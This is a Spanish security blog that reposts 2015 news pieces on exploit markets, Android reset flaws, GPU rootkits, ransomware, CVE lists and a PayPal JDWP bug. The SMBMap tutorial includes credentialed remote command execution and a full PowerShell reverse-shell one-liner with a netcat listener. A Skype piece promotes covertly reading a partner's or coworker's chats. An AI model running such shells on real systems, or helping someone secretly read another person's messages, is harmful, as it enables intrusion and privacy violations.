Suscribete a Mi Canal en YOUTUBE ==> da CLIC AQUÍ

Canal netamente académico donde se enseñará como atacan los ciberdelincuentes y como protegerse de estos ataques.

No me hago responsable del mal uso de los conocimientos adquiridos. Por Favor, Siempre ÉTICOS !

viernes, 29 de mayo de 2015

TheRealDeal Market: venta de exploit en la Deep Web.

Durante el último mes, ha surgido un nuevo mercado autodenominado TheRealDeal Market en la Deep Web, enfocado en las ventas de exploits, vulnerabilidades y ataque 0-Day.

Tal y como sucedía con el sitio de SilkRoad y sus sucesores en el mercado negro como Agora y Evolution, TheRealDeal se ejecuta como un servicio Tor ocultado y utiliza bitcoin para ocultar las identidades de sus compradores, vendedores y administradores. Pero mientras que algunos otros sitios han vendido sólo herramientas básicas y robado los detalles financieros, los creadores de TheRealDeal buscan convertirse en un corredor premium de vulnerabilidades, código fuente y servicios de hacking.

Actualmente un exploit para iCloud se ofrece por un precio de U$S 17.000 en bitcoin, pretendiendo ser un nuevo método de hackeo de cuentas de Apple iCloud. Otros exploits incluyen una técnica para hackear la configuración multisitio de WordPress, un exploit contra Android Webview y un ataque de Internet Explorer que dice funcionar en Windows XP, Windows Vista y Windows 7, disponible por alrededor de U$S 8.000 en bitcoin.
Todavía no se ha demostrado que ninguno de estos 0-Day sea real pero por un sistema de fideicomiso usado en el sitio, mediante la característica de bitcoin multisignature transaction, está diseñado para evitar que los estafadores ventas exploits falsos

_________________________________________
Tomado de :
http://blog.segu-info.com.ar/2015/05/therealdeal-market-venta-de-exploit-en.html?m=1#therealdeal-market-venta-de-exploit-en
Se respetan derechos de autor.

jueves, 28 de mayo de 2015

Vulnerabilidad en el "Factory Reset" de Android.

Si usted está pensando en vender su teléfono inteligente Android entonces necesita pensarlo de nuevo porque hay una debilidad en la opción Factory Reset que podría ser aprovechado para recuperar las credenciales de acceso, mensajes de texto, correos electrónicos y fotos.

La función Factory Reset integrada en el sistema operativo móvil de Google Android, se considera que es la característica más importante que permite borrar "todos" los datos confidenciales de los dispositivos smartphone antes de que el mismo sea vendido o reciclado.

Sin embargo, un grupo de investigadores de la Universidad de Cambridge encontró que los datos podrían ser recuperados desde el dispositivo Android, incluso si los usuarios activan el cifrado de memoria completo. Estos hallazgos aparecen en un trabajo de investigación titulado "Security Analysis of Android Factory Resets" [PDF], el cual "es suficiente para dar un toque de atención a las grandes empresas, así como usuarios individuales"

Los investigadores calcularon que más de 500 millones de teléfonos inteligentes no pueden borrar correctamente los datos almacenados, tales como las credenciales y otros datos sensibles. Por otra parte, cerca de 630 millones de dispositivos no pueden eliminar por completo las tarjetas SD internas donde se guardan los archivos multimedia como fotos y video.

Los investigadores estudiaron la aplicación de Factory Reset en 21 smartphones Android diferentes que corrían versiones 2.3.x de 4.3 del sistema operativo móvil y se vendían por cinco proveedores diferentes, incluyendo Google, HTC, LG, Motorola y Samsung. Después de ejecutar restablecimiento de fábrica en todos los teléfonos inteligentes, los investigadores fueron capaces de recuperar al menos algunas "migajas" de los datos antiguos, incluyendo mensajes de texto, credenciales de la cuenta de Google, conversaciones sobre aplicaciones de terceros como Facebook y WhatsApp, mensajes de texto de SMS y correos electrónicos, como así como imágenes y vídeos de la cámara.

El estudio puso de relieve cinco fracasos al restablecer el dispositivo a fábrica:
  • La falta de apoyo de Android para la eliminación adecuada de la partición del sistema en los dispositivos que ejecutan versiones 2.3.x del sistema operativo móvil.
  • Actualizaciones incompletas por parte de los fabricantes de teléfonos inteligentes.
  • La falta de soporte de controladores actualizados por parte de los vendedores en los dispositivos más recientes, con versiones 4.1, 4.2 y 4.3.
  • La falta de soporte de Android para la eliminación adecuada de la tarjeta interna y externa SD en todas las versiones de los sistemas operativos móviles.
  • La fragilidad del método de cifrado completo, utilizado para mitigar los problemas hasta la versión Android 4.4 KitKat.
data-recovery
Por otra parte, los investigadores también fueron capaces de extraer el master token del 80 por ciento de los teléfonos inteligentes. Este token permite acceder a su mayoría de los datos de Google, incluyendo Gmail y Google Calendar.

Por lo tanto, es difícil decir que los datos del usuario han desaparecido totalmente una vez que se ejecuta una restauración de fábrica. Asimismo, eliminar manualmente cada mensaje, foto y aplicación no destruye los archivos del teléfono porque los teléfonos utilizan memoria flash que es muy difícil de borrar.


________________________________________________________________
Tomado de:  http://blog.segu-info.com.ar/2015/05/vulnerabilidad-en-el-factory-reset-de.html
Se Respetan Derechos de Autor.

lunes, 18 de mayo de 2015

SMBMap, busca datos sensibles en recursos compartidos Windows desde Kali !

"...ya tenemos disponible en los repositorios de Kali Linux SMBMap, una herramienta que nos permitirá enumerar recursos compartidos samba a lo largo de un dominio. Y no sólo eso, enumera contenidos y permisos, soporta pass-the-hash, descarga/sube/borra ficheros, busca patrones de nombres de fichero con la opción de autodescargarlos e incluso ejecuta comandos en remoto.

Esta herramienta fue diseñada teniendo en mente el pentesting y tiene como objetivo simplificar la búsqueda de datos potencialmente sensibles a través de redes de gran tamaño.

Instalación en dos patás:
sudo apt-get update
sudo apt-get install smbmap

Algunos ejemplos de autor:


Salida por defecto:
$ cat smb-hosts.txt | python smbmap.py -u jsmith -p 'R33nisP!nckl3' -d ABC
[+] Reading from stdin
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.0.5:445 Name: unkown                                            
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  READ, WRITE
        C$                                                      READ, WRITE
        IPC$                                                    NO ACCESS
        TMPSHARE                                                READ, WRITE
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445        Name: unkown                                            
        Disk                                                    Permissions
        ----                                                    -----------
        IPC$                                                    NO ACCESS
        print$                                                  READ, WRITE
        My Dirs                                                 NO ACCESS
        WWWROOT_OLD                                             NO ACCESS
        ADMIN$                                                  READ, WRITE
        C$                                                      READ, WRITEPaste your text here.

Ejecución de comandos:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -h 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445        Name: unkown                                            
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abcadmin                  
The command completed successfully.

Listado de recursos no recursivo (ls):
$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 172.16.0.24:445 Name: 172.16.0.24                                       
    Disk                                                    Permissions
    ----                                                    -----------
    C$                                                      READ, WRITE
    .Users                                             
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
    fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
    dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus

Búsqueda de contenido en archivos:
$ python smbmap.py -h 192.168.1.203 -u Administrator -p p00p1234! -F password --search-path 'C:\Users\wingus\AppData\Roaming'
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.1.203:445 Name: unkown                                            
[+] File search started on 1 hosts...this could take a while
[+] Job 861d4cd845124cad95d42175 started on 192.168.1.203, result will be stored at C:\Windows\TEMP\861d4cd845124cad95d42175.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 1 completed
[+] All jobs complete
Host: 192.168.1.203       Pattern: password
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\logins.json
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles\35msadwm.default\prefs.js

Listado de unidades:
Esta característica fue añadida para complementar la búsqueda de conenido.
$ python smbmap.py -h 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L 
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.1.24:445 Name: unkown                                            
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
    E:      \\vboxsrv\Public      VirtualBox Shared Folders

Shell "elegante":
Ejecuta el script Powershell en el host SMB de la víctima (cambia la IP por la tuya para la conexión inversa).
$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445        Name: unkown                                            
[!] Error encountered, sharing violation, unable to retrieve output

Listener netcat del atacante:
$ nc -l 4445
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
 nt authority\system
Github: https://github.com/ShawnDEvans/smbmap

..."


_________________________________________________
Tomado de: http://www.hackplayers.com/2015/05/smbmap-busca-carpetas-windows-desde-kali.html
Se Respetan Derechos de Autor.

¡ JELLYFISH y DEMON: Rootkits que infectan el Firmware de tu GPU !






De todas las amenazas digitales que pueden afectar a un ordenador, el rootkit merece sin lugar a dudas un capítulo aparte. Su capacidad de sigilo y su resistencia a los métodos tradicionales de limpieza convierten al rootkit promedio en un oponente formidable, y a esto debemos sumar la creatividad de sus desarrolladores. En esta ocasión, nos encontramos con Jellyfish, una «prueba de concepto» en materia de rootkits que puede infectar el sistema gráfico de un ordenador, mejorando así tanto su camuflaje como su rendimiento.  


La idea de infectar firmware no es nueva. Los expertos han explorado esta posibilidad durante años, y las novedades en relación a la NSA haciéndose un festín con los discos duros no hace otra cosa más que confirmar todo lo que habíamos sospechado hasta aquí. Obviamente estamos de acuerdo en que no son rutas de ataque «sencillas», pero los recursos técnicos existen, y el interés es cada vez más amplio. Quien no esté convencido de eso sólo debe hacer una visita a GitHub para descubrir dos nuevas pruebas de concepto. La primera, que reclama prioridad en nuestro título, se llama Jellyfish.   En términos sencillos, se trata de un rootkit capaz de infectar el GPU de un ordenador, y permanecer allí aún después de ser apagado. ¿Por qué alguien decidiría infectar a un GPU? En realidad, las razones son bastante buenas.

Además de mantenerse intacto en el hardware, Jellyfish puede espiar la memoria del CPU a través de DMA, y aprovechar los recursos del GPU disponibles para operaciones matemáticas. Como si eso fuera poco, no existe ninguna herramienta de análisis que verifique la presencia de código malicioso en un GPU.    Hasta ahora, las variantes de malware que buscaban extraer algo del GPU lo hacían pensando en la minería de criptomonedas, pero Jellyfish trabaja a un nivel más profundo. Sus requerimientos técnicos nos hablan de controladores OpenCL, y hardware Nvidia o AMD, con un soporte limitado para chips Intel con ayuda del SDK de AMD. El desarrollo de Jellyfish no está completo, y una de sus misiones a futuro será incorporar un «client listener», que mantendrá los buffers almacenados en el GPU hasta que el servidor de control envíe un paquete para liberarlos.

El segundo malware es un keylogger conocido como Demon, inspirado en un estudio que la Universidad Columbia publicó en el año 2013. La idea aquí es que Demon vigile el buffer del teclado desde el GPU vía DMA, sin depender de clásicos «ganchos» o modificaciones agresivas sobre el código del kernel. Los responsables de Demon y Jellyfish insisten en que no tienen relación con los creadores del estudio de Columbia, y a decir verdad, no es necesario que la tengan para causar ruido. ¿Un GPU espiando y registrando todo lo que escribimos? En mi manual, eso es una pesadilla. Por otro lado, existe la función IOMMU (input/output memory management unit), que entre otras cosas protege a la memoria de acciones extrañas en DMA, aunque no está presente en todo el hardware. Implementar un ataque basado en Jellyfish probablemente sea muy difícil, sin embargo… el código está en GitHub.

Jellyfish: https://github.com/x0r1/jellyfish 
Demosn: https://github.com/x0r1/Demon

____________________________________________________
Tomado de: http://www.neoteo.com/jellyfish-un-rootkit-que-infecta-tu-gpu/
Se respetan Derechos de Autor.

"Pollos Hermanos", nueva variante de Cryptolocker


Los expertos en seguridad han observado que surgió una nueva infección de programa maligno denominada Los Pollos Hermanos. A pesar de que se conoce que esta amenaza es CryptotoLocker, se la denomina Los Pollos Hermanos porque utiliza la temática del programa televisivo famoso Breaking Bad. Los especialistas que trabajan en pcthreat.com han revelado que esta amenaza apunta principalmente a usuarios de computadoras de Australia; sin embargo, todavía existe la posibilidad de poder encontrársela si vive en algún otro lugar pero utiliza una dirección de IP de Australia. También debe mencionarse que solo afecta al sistema operativo de Windows. Es muy importante eliminar la amenaza Los Pollos Hermanos del sistema tan pronto como sea posible si sucede que se filtra en su PC. Desafortunadamente, no es tarea fácil hacerlo.

La investigación llevada a cabo por PCThreat ha demostrado que Los Pollos Hermanos codificarán varias fotografías, videos, documentos y otros archivos para sacarles dinero a los usuarios. Además, le ofrecerá un mensaje informándole que todos los principales archivos han sido codificados y le pedirán que pague un rescate. En la mayoría de los casos, los usuarios tienen que pagar un rescate de $450 AUD; sin embargo, este monto podría subir hasta $1000 AUD. Entendemos que desea obtener acceso a sus archivos tan pronto como sea posible pero todavía no le recomendamos pagar ese dinero ya que perderá su dinero y nadie sabe si recibirá la clave para la decodificación de sus archivos. Como puede observarse, Los Pollos Hermanos actúa como infecciones publicadas con anterioridad (ej.: CryptotoLocker y Cryptowall); no obstante, es única en el sentido que utiliza la temática de Breaking Bad, reproduce música de fondo y le ofrece a los usuarios un video que explica cómo hacer un pago en Bitcoins.

Los Pollos Hermanos utiliza técnicas de ingeniería social para infectar las computadoras. Se ha observado que ingresa al sistema a través de un archive maligno .ZIP. Este archivo generalmente contiene un archivo maligno PENALTY.VBS. Si los usuarios lo ejecutan, la amenaza Los Pollos Hermanos se descarga en el sistema.


_____________________________________________
Tomado de: http://blog.segu-info.com.ar/2015/05/pollos-hermanos-nueva-variante-de.html
Se Respetan Derechos de Autor.

Servicio Gratuito AntiBotnet: Detección de Dispositivos Zombis en tu Empresa !


¿Últimamente has notado que en tu empresa los ordenadores van más lento de lo normal, el ventilador hace mucho ruido aún cuando no lo estás utilizando y algunas aplicaciones han dejado de funcionar correctamente? Estos síntomas podrían ser debidos a que ese ordenador de tu empresa se ha convertido en un pc “zombi”. ¿Eso qué significa? Que hay alguien, aparte de ti, que está controlando tu ordenador sin que seas consciente de ello, y esto supone un riesgo para tu principal activo: la información.

Esto quiere decir que alguien, sin estar físicamente delante de tu ordenador, y con los conocimientos técnicos suficientes, puede manejarlo a su antojo. Pero eso no es todo, si tu ordenador es un zombi, estará formando parte de una red zombi de ordenadores, más conocido por el término anglosajón botnet, que no es más que un gran número de ordenadores zombi, infectados con el mismo tipo de virus, que están controlados por una misma persona u organización criminal.

¿Por qué quieren que los ordenadores de tu empresa pertenezcan a una botnet?
Principalmente para llevar a cabo actividades que les generen unos beneficios económicos. Hay personas muy interesadas en comprar estas botnets para:
  • Capturar contraseñas y datos personales. Recopilan las contraseñas de los servicios de banca, redes sociales, correo web (Gmail, Outlook, etc.) que utilizan los usuarios del ordenador infectado para después venderlas en el mercado negro de Internet.
  • Enviar spam y propagar virus. Los ordenadores zombis pueden estar organizados para enviar correo basura(Botnet kelihos), spam, a miles de direcciones de correo que han sido recopilas previamente de e-mails en cadenas y bulos, por ejemplo. Estos correos spam, pueden adjuntar ficheros que descargan virus en el ordenador del usuario al abrirlos o incluir enlaces a páginas que suplantan la identidad de servicios (phishing), descargan otros virus en el ordenador, instalan toolbars no deseados en el navegador, etc.
  • Hacer que una página web deje de estar disponible. El ciberdelincuente que tenga el control de la botnet, indicará a todos sus zombis que accedan a la vez a una determinada página web para saturarla y provocar que deje de funcionar correctamente con el objetivo de chantajear al propietario o empresa responsable de la misma.
  • Manipular encuestas y abusar de los servicios de pago por publicidad. Los ordenadores zombis también pueden ser utilizados para manipular encuestas o pinchar en banners publicitarios que generan beneficios económicos a los ciberdelincuentes.
  • Llevar a cabo desde tu ordenador otro tipo de fraudes. Acceder a páginas web cuyo contenido es denunciable o ilegal: pedofilia, prostitución, drogas, armas, etc. Almacenar y compartir ficheros con copyright, suplantar tu identidad para publicar anuncios falsos, etc.
¿Cómo puedes evitar que tu ordenador acabe en una botnet?
Te recomendamos que mantengas actualizado el sistema operativo y todos los programas instalados en él, protejas el ordenador con alguna herramienta de seguridad como antimalware , tengáis unos buenos hábitos de uso establecidos a partir de la definición de una serie de políticas de seguridad.

Estas medidas, además deberán de venir acompañadas con acciones de concienciación en materia de ciberseguridad dentro de la empresa. De esta forma los tendrán una mejor conocimiento sobre las diferentes amenazas y aplicarán medidas básicas de prevención: no instalando nada que no hayas elegido, no pulsando enlaces de e-mails cuyo remitente desconoces, desconfiando de los chollos que te anuncian por Internet, etc.

¿Quieres saber si algún equipo de tu empresa pertenece a una botnet?

Ponemos a disposición de tu empresa un servicio gratuito que permite saber de manera fácil y sencilla si algún equipo de tu empresa está infectado por una botnet.



____________________________________________________
Tomado de: https://www.incibe.es/blogs/post/Empresas/BlogSeguridad/Articulo_y_comentarios/Servicio_antibotnet_pymes
Se respetan Derechos de Autor.

domingo, 10 de mayo de 2015

Vulnerabilidad de validación de certificados en SQUID !

Se ha solucionado una vulnerabilidad en Squid que podría permitir que un servidor evite la validación de certificados cliente.
Squid es uno de los servidores proxys más populares, en gran parte por ser de código abierto y multiplataforma (aunque sus comienzos fueron para sistemas Unix).
El fallo está considerado importante debido a que podría permitir que servidores remotes realicen la validación de certificados cliente. El problema reside en la validación de los campos hostname/domain de un certificado X509. Algunos atacantes también pueden utilizar certificados válidos firmados por una Autoridad Certificadora para un dominio para abusar de un dominio ajeno.
La vulnerabilidad, con CVE-2015-3455, solo es explotable en sistemas Squid con "SSL-Bumb" con el modo de operación "client-first" o "bump". Se ven afectadas las versiones Squid 3.2 a 3.2.13, Squid 3.3 a 3.3.13, Squid 3.4 a 3.4.12 y Squid 3.5 a 3.5.3.
Los problemas están solucionados en las versiones Squid 3.5.4, 3.4.13, 3.3.14 y 3.2.14.
o se puede también aplicar los parches disponibles desde:
Squid 3.2:
Squid 3.3:
Squid 3.4:
Squid 3.5:
___________________________________________________

Tomado de: http://unaaldia.hispasec.com/2015/05/vulnerabilidad-de-validacion-de.html
Derechos de Autor.

LAS 30 VULNERABILIDADES MÁS EXPLOTADAS !

Fruto del análisis de varios CERTs se ha publicado una lista que pretende alertar de las 30 vulnerabilidades más empleadas en la gran mayoría de los ataques.

 
La lista publicada por el US-CERT está basada en un análisis completado por el Canadian Cyber Incident Response Centre (CCIRC, Centro Canadiense de Respuesta a Ciberincidentes) y desarrollado en colaboración con otros CERTs de Canadá, Nueva Zelanda, Reino Unido y el Centro de Ciberseguridad de Australia.

El desarrollo de esta lista viene del hecho de que más del 85 por ciento de los ataques contra infraestructuras críticas podrían evitarse mediante el uso de estrategias adecuadas como el bloqueo de software malicioso, restringir los privilegios administrativos y parchear aplicaciones y sistemas operativos. La alerta publicada ofrece la información de las 30 vulnerabilidades más empleadas en estos ataques, para todas ellas existen parches y actualizaciones que evitarían cualquier problema.

Las vulnerabilidades afectan a software de Adobe, Microsoft, Oracle (Java) y OpenSSL.

Sorprende encontrar entre la lista una vulnerabilidad de incluso hace 10 años, como un problema en Internet Explorer en la interpretación de caracteres ASCII extendido (CVE-2006-3227). Aunque no deja de ser preocupante que la gran mayoría de las vulnerabilidades descritas tienen más de tres años de antigüedad.

Es el software de Microsoft el que abarca la mayor parte del listado, con 16 vulnerabilidades, los problemas se centran principalmente en el navegador Internet Explorer y Office. Por otra parte, tampoco sorprende descubrir 11 vulnerabilidades en productos Adobe principalmente en Reader y Acrobat.

Por último dos vulnerabilidades en Java y una en OpenSSL, la conocida como Heartbleed.

Microsoft

CVEAffected ProductsPatching Information
CVE-2006-3227​Internet ExplorerMicrosoft Malware Protection Encyclopedia Entry
CVE-2008-2244Office WordMicrosoft Security Bulletin MS08-042
CVE-2009-3129Office
Office for Mac
Open XML File Format Converter for Mac
Office Excel Viewer
Excel
Office Compatibility Pack for Word, Excel, and PowerPoint
Microsoft Security Bulletin MS09-067
​CVE-2009-3674​Internet Explorer​Microsoft Security Bulletin MS09-072
CVE-2010-0806​​Internet ExplorerMicrosoft Security Bulletin MS10-018
CVE-2010-3333Office
Office for Mac
Open XML File Format Converter for Mac

Microsoft Security Bulletin MS10-087
CVE-2011-0101Excel
Microsoft Security Bulletin MS11-021
CVE-2012-0158Office
SQL Server
BizTalk Server
Commerce Server
Visual FoxPro
Visual Basic
Microsoft Security Bulletin MS12-027
CVE-2012-1856Office
SQL Server
Commerce Server
Host Integration Server
Visual FoxPro Visual Basic
Microsoft Security Bulletin MS12-060
​CVE-2012-4792​Internet Explorer​Microsoft Security Bulletin MS13-008
CVE-2013-0074​Silverlight and Developer RuntimeMicrosoft Security Bulletin MS13-022
CVE-2013-1347​Internet ExplorerMicrosoft Security Bulletin MS13-038
CVE-2014-0322​​​Internet ExplorerMicrosoft Security Bulletin MS14-012
CVE-2014-1761Microsoft Word
Office Word Viewer
Office Compatibility Pack
Office for Mac
Word Automation Services on SharePoint Server
Office Web Apps
Office Web Apps Server
Microsoft Security Bulletin MS14-017
​CVE-2014-1776​Internet ExplorerMicrosoft Security Bulletin MS14-021

CVE-2014-4114
​WindowsMicrosoft Security Bulletin MS14-060

Oracle

CVEAffected ProductsPatching Information
CVE-2012-1723Java Development Kit, SDK, and JREOracle Java SE Critical Patch Update Advisory - June 2012
CVE-2013-2465Java Development Kit and JREOracle Java SE Critical Patch Update Advisory - June 2013

Adobe

CVEAffected ProductsPatching Information
​CVE-2009-3953Acrobat Reader​Adobe Security Bulletin APSB10-02​
​CVE-2010-0188Acrobat Reader​Adobe Security Bulletin APSB10-07
CVE-2010-2883Acrobat Reader​Adobe Security Bulletin APSB10-21
CVE-2011-0611
​Flash Player
AIR
Acrobat Reader

Adobe Security Bulletin APSB11-07
Adobe Security Bulletin APSB11-08​
​CVE-2011-2462
Acrobat Reader​
Adobe Security Bulletin APSB11-30
​CVE-2013-0625ColdFusion​Adobe Security Bulletin APSB13-03
CVE-2013-0632​ColdFusionAdobe Security Bulletin APSB13-03
​CVE-2013-2729
​Reader Acrobat
Adobe Security Bulletin APSB13-15
​CVE-2013-3336​ColdFusionAdobe Security Bulletin APSB13-13
CVE-2013-5326​ColdFusionAdobe Security Bulletin APSB13-27
CVE-2014-0564Flash Player
AIR
AIR SDK & Compiler
Adobe Security Bulletin APSB14-22

OpenSSL

CVEAffected ProductPatching Information
CVE-2014-0160OpenSSLCERT Vulnerability Note VU#720951

__________________________________________________
Tomado de: http://blog.segu-info.com.ar/2015/05/las-30-vulnerabilidades-mas-explotadas.html#las-30-vulnerabilidades-mas-explotadas
Se respetan Derechos de Autor.



domingo, 3 de mayo de 2015

Extraer conversaciones de Skype.

Nos remitimos a la frase que nuestro compañero Miguel Ángel Arroyo viene utilizando hace ya años ¿Estás seguro de que estás seguro?. Juego de palabras acertadísimo que resume toda la “lucha” contínua de la (in)seguridad informática que hoy es igualmente aplicable para el artículo que vamos a tratar.
Por ello,  y tras observar en un cliente el uso intenso del Skype en su día a día en el “curro”, me propuse buscar como podría extraer conversaciones Skype que este realiza con sus proveedores. La tarea se planteaba tediosa ya que se supone que tendría que remover ficheros, interceptar conversaciones, cifrados, escama de dragón, etcétera… Todo esto antes de ponerme con la faena.
Un momento Doc, ¿me estás diciendo que has construido una máquina del tiempo con un De Lorean?” Pues casi. Vamos a instalar una “máquina del tiempo” que viaja solo al pasado (hay que perfeccionarla xD) para ver conversaciones antiguas de Skype.
reversing_skype
Buscando algo de información me topé con la aplicación Skype Sneak Tool (Descargar) Es muy muy sencilla de usar. Tiene versión Pro que te permite comprar apartamentos en primera línea de playa bueno eso no pero si te permite ver las imágenes o extraer la información. Con la Free nos sobra.
Bueno pero es que instalar la aplicación es muy sencillo, ¿dónde está la investigación? Seguramente llevas razón pero mirémoslo desde el lado de la persona que no tiene ni idea de informática y mucho menos de forensica o pentesting.
Conversaciones que un empleado poco ducho en la materia quiere sacar a su compañero por X motivos, un novio/a celoso/a que quiere ver con quién filtea (o no) su pareja o ¡ Controlar a tus hijos !
El proceso es sencillo. Descargar, instalar y a funcionar. Así se es Skype Sneak Tool.
Una vez instalado solamente tenemos que ejecutar la aplicación. Se iniciará y veremos una única ventana con varios iconos muy intuitivos y que rayan nivel de “párvulos” 😛
Antes de nada tenemos que elegir el usuario. En el equipo puede haber cero, una o veinte cuentas Skype. Navegamos para ello en el botón con los “…” al lado del botón “Analizar”.
Elegimos el usuario en cuestión (en este caso, el nuestro por supuesto 😛 ) y aceptamos. Ahora solo queda pulsar el botón “mágico” Analizar. Y podemos empezar el análisis.
conversacionmiguel
Figura 1
En la Figura 1 vemos el historial de conversación con Miguel Ángel Arroyo que sirvió de “conejillo de indias” para probar la utilidad Skype Sneak Tool.
conversacionLLAMADAS
Figura 2
Otro menú para curiosear es el de llamadas. Tanto salientes como entrantes. En la Figura 2 vemos las entrantes, omitiendo alguna información para conservar la privacidad.
conversacionCONVERSACIONES
Figura 3
En esta Figura 3 vemos los contactos que tenemos en la cuenta analizada. Pudiendo extraer detalles de dónde son, nombre o país.
Las demás opciones, como “Vista previa” o “Extraer” están disponibles en la versión de pago. Aunque con esto ya tenemos un control total sobre las conversaciones Skype.
Actualización: Visto la gran cantidad de lecturas que está teniendo y algunos usuarios que me preguntan por las alternativas a Skype, voy a ampliar un poco el artículo.
Como primera alernativa tenemos Tox. Es una aplicación que nació para asegurar la privacidad. La crearon expertos en seguridad debido a las contínuas revelaciones de fuga de información a la NSA (saludad, la hemos nombrado xD). Su funcionamiento radica en un sistema P2P por lo que no se sirve de una “tercera” parte como sería el servidor Skype en nuestro caso.
Esta en fase Beta pero no deja de ser una opción interesante.
Otra opción es Jitsi. Es un cliente multiplataforma y multiservicio (soporta Jabber, el chat de Facebook, Yahoo! Messenger y Google Talk). También soporta el protocolo SIP y, sobre éste, nos ofrece algunas funcionalidades más interesantes.
Nos ofrece la posibilidad de cifrar nuestras comunicaciones en comunicaciones basadas en XMPP y en SIP. Nos permite usar ZRTP y SDES/SRTP para cifrar comunicaciones de voz usando, por ejemplo, una llamada 1 a 1 sobre SIP o a través de nuestro propio servidor XMPP de mensajería (si no poseemos ninguno podemos usar el servidor XMPP de Jitsi).
Por último tenemos Cryptocat. Una solución bastante geek con un aspecto “8biteño” que a muchos os gustará.
Es un servicio que funciona sobre la web, accesible desde prácticamente cualquier navegador (incluso en dispositivos móviles), sin necesidad de complementos adicionales. Es un proyecto libre y abierto. El objetivo que persigue Cryptocat es ofrecer una solución al problema de la comunicación privada en la web. El famoso Nadim Kobeissi, un gran hacker y activista, es el líder del proyecto.
Cryptocat usa el protocolo “Off-the-Record Messaging” (OTR) para cifrar mensajes privados. Cryptocat también puede ser utilizado de manera conjunta con Tor añadiendo un extra de seguridad. El proyecto también planea crear una versión embebida o integrada para dispositivos Raspberry Pi.
Como curiosidad su autor fue llamado “a careo” por el FBI(saludad de nuevo xD) por su lucha contra la censura. Cuando fue liberado, publicó el incidente en Internet y Cryptocat fue cogiendo mucha fama a raiz de esto.
Como veis, alternativas hoy en día no faltan. El problema es extender su uso y hacerlo conocido a todos los usuarios. Ahora mismo puedes hablar de Skype a todas las personas que más o menos lo conocen pero si hablamos de estos clientes alternativos que algunos están en fase Beta, pues nadie los conoce. Es la misma problemática con Whatsapp y/o Telegram/Line etcétera.


_________________________________________
Tomado de: http://hacking-etico.com/2015/04/30/extraer-conversaciones-skype/
Se Respetan Derechos de Autor.

Vulnerabilidad crítica en Paypal

El investigador de seguridad independiente Milan A Solankia ha divulgado una vulnerabilidad crítica (CVSS de 9.3) de ejecución remota de código en el sitio web de marketing de PayPal (www.paypal-marketing.com). Esta vulnerabilidad podría ser aprovechada por un atacante para ejecutar código en el servidor de aplicaciones web con permisos de root.

La vulnerabilidad reside en el Protocolo Java Debug Wire Protocol (JDWP) del sitio de marketing de PayPal y permitía comprometer completamente el servidor web de la empresa.
JDWP es un protocolo que se utiliza para la comunicación entre la máquina virtual de Java y el depurador. Sin embargo, JDWP no utiliza ninguna autenticación y pero podría ser abusada para ejecutar código arbitrario en el servidor Web afectado.

Solanki publicó un video con la prueba de concepto para demostrar el ataque en el puerto 8000 y con la herramienta jdwp-shellifier, que se puede descargar de Github.

El puerto abierto 8000 permite establecer una conexión con el servicio, sin ninguna autenticación previa y permite ejecutar código del lado del servidor y con privilegios de root.

